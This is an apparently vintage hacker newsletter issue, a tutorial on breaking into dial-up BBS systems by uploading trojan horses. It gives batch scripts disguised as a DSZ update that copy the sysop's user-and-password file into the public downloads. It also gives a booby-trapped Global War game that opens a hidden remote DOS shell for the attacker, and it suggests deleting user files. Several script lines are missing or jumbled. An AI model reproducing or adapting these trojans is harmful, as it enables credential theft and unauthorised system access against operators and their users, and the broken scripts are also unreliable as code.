Computer Terror and Distruction
Issue #1 – BBS Infiltration _____By the Chamelion
>This article starts of the first issue of Computer Terror and Distruction. Each issue will deal with a particular area of computer distruction, dealing mostly with different ways to fuck over computers.
After taking a look at some of the better phreak/hack BBS systems, I haven’t been able to find any good material on BBS distruction. Most of the information I have gathered is rather simple and outdated, and dealt mostly with hitting Control Break alot. Well, as most BBS systems are no longer written is basic, this is a rather stupid thing to try doing. (Although it still works on some lame BBS games). One of the best methods of breaking into a BBS is uploading a trojan horse. The easiest language to create a trojan is in batch language. However, the sysop can easily view the program before he runs it, and thus the
trojan is discovered. However, using a new program called BAT2EXEC, you can convert your trojan batch file to a COM file, which is harder to read.
(Note: If BAT2EXEC.COM isn’t in the archive file, it was created by Pc.Magazine and can be found on many sharewars BBS’s)
To compile a batch file edit the batch file with edlin then type in BAT2EXEC.COM, followed by the batch file. It will convert the file to COM format. This is nice for speeding up large batch files, etc. But, there is another important reason which makes this program useful. Let’s say that there is this lamer BBS is your area, and you want to mess with the BBS. Here, you have two choices. You can steal the USERS.BBS listing, which includes all users and their passwords. Or, you can set up his BBS so you can shell to his DOS to do whatever you want. What you want to do is setup a Trojan Horse on the system to do whatever you want. The best way to do this is to give the sysop software that he is likely to use. Secretly you booby-trap it to do what you want.
Ok, the next section deals with how to steal the USERS.BBS listing, which includes all user names and passwords. The second section is all about how to get access to the systems DOS via modem. I’d read the first section, as it includes lots of information you need to know.
SECTION #1 – How to get a copy of the user file.
First, get the docs for the type of software the target BBS operates with, and find out the name of listing. USERS.BBS works for Remote Access, but Pcboard, etc use different names. Now, get some utility or game that the BBS sysop is sure to run on his system. Now, look at the files that are included in the utility (or game).
For example, DSZ includes-
and a bunch of other shit. So, first rename DSZ.EXE DSZ.DAT. Then, using EDLIN (For some reason, you need to use EDLIN for it to work with BAT2EXEC. This is probably because in EDLIN you hit control C to end the text, and BAT2EXEC looks for this. So, you can type everything but the last two lines in a text editor, and finish it off with EDLIN, using CONTROL C to stop entering text.)
Now, make a batch file called DSZ.BAT. It should look something like this.
IF EXIST C:\RA\USERS.BBS GOTO COPY
REM Checks to see if the USERS.BBS listing is there.
IF EXIST D:\FILES\UPLOAD\GAME.ZIP GOTO DSZ
REM Sets it to only copy once.
REM Now we want to copy the USERS.BBS listing to the new file
REN directory, under the name of GAME.ZIP
COPY C:\RA\USERS.BBS D:\FILES\UPLOAD\GAME.ZIP >DMP.DMP
REM DMP.DMP is used to redirect the screen output
REM Now is the tricky part. You need to have FILES.BBS listing
REM add TOOBIN1.ZIP to it’s listing of on-line files.
COPY DSZ.DMP + D:\FILES\UPLOAD\FILES.BBS
D:\FILES\UPLOAD\FILES.BAK > DMP.DMP
REM D:\files\upload will change depending on the sub-dir setup.
REM DSZ.DMP, a file you will need to make, is appended to
REM a listing of all available files.
COPY D:\FILES\UPLOAD\FILES.BAK D:\FILES\UPLOAD\FILES.BBS >DMP.DMP
REM Now we want to run DSZ like normal.
REN DSZ.DAT DZ.EXE
REM Turn back on monitor
DSZ %1 %2 %3 %4 %5 %6 %7
REN DZ.EXE DSZ.DAT
REM All done!
Now, run BAT2EXEC DSZ.BAT, to create DSZ.COM
Ok, remember how i said you need to add USERS.BBS (which was renamed game.zip) to the FILES.BBS listing? Ok, now create a file that is called DSZ.DMP, and that looks like this.
GAME.ZIP Game Disk #1, cracked by INC!
(Description should start on 14th line)
Now I will recap what will happen when you have everything setup. The sysop sees that someone (You) has uploaded the newest version of DSZ Z-Modem, so he installs it. The files he places in his protocol directory are:
DSZ.COM -Your batch file changed into COM.
DSZ.DAT -The real DSZ
DSZ.DOC -Docs to DSZ
DSZ.DMP -Has text that says “game.zip”
Now, he gets his BBS software to run DSZ.COM, which he thinks is DSZ. Because it’s a com file, he can’t tell what it does, which is the whole reason for using BAT2EXEC.COM anyway. There is no way he can tell what DSZ.COM does. DSZ.COM runs, and copies USERS.BBS listing to the new files listing under the name GAME.ZIP. Then, DSZ.DMP is added to the Files.BBS listing, so when you do a listing of new files, it will be there. Then DSZ.DAT is renamed to DZ.EXE. DZ.EXE is then run. Then DZ.EXE is renamed back to DSZ.DAT. Now, all you have to do is download GAME.ZIP, and you are off!
Of course, it is even easier to delete Users.BBS, but that’s not as much phun.
Ok, now let’s say you want to shell to the BBS system’s DOS, instead of copying the user listing. Do this when the sysop is out of town, etc, so he doesn’t show up and see what you are doing. This time, the example uses Global War, a popular BBS game.
Rename Gwar.exe GW.DAT
IF %5==JACK GOTO FIRST
IF %5==jack goto first
REM Replace Jack with your first name
IF %6==RIPPER GOTO LAST
if %6==ripper GOTO LAST
REM Replace Ripper with your last name
REM Choose the com port that the BBS uses!
REM Just type “Exit” to end the shell
ren gw.dat gw.exe
gw.exe %1 %2 %3 %4 %5 %6 %7
ren gw.exe gw.dat
Now, when you give the sysop the file, and he installs it, whenever you try to run GWAR, you will be placed in a DOS shell! just remember several things. Don’t try to directly import any of these files. You will need to make modifications, depending on the BBS type, and several other parameters. For example, Gwar is not always run from the command line, and may search a file for the user name. It is important that no one is around when you do this. It’s a good idea to mess around as much as possible before you upload something.
Also, when you are in that DOS shell, don’t run any graphic applications. The best way to do it is to upload a simple gateway program like PC Anywhere. Once you are in DOS, go unzip it and then run it. The best thing to do is be completely original in your style of creating trojan horses, always use a bogus name or alias.
BTW, I can be reached via bitnet at
Or on Lost Dungeon 1 gig! (212)
(I do not accept any responsabilty for what you may do (or have done to you) with this information. Use at your own risk)
Greets go out to Electric Monk, The Pope, and Zolten Coldia, and Road Master.
EGBT is comming to a computer near you! and Road Master.
EGBT is comming to a computer near you!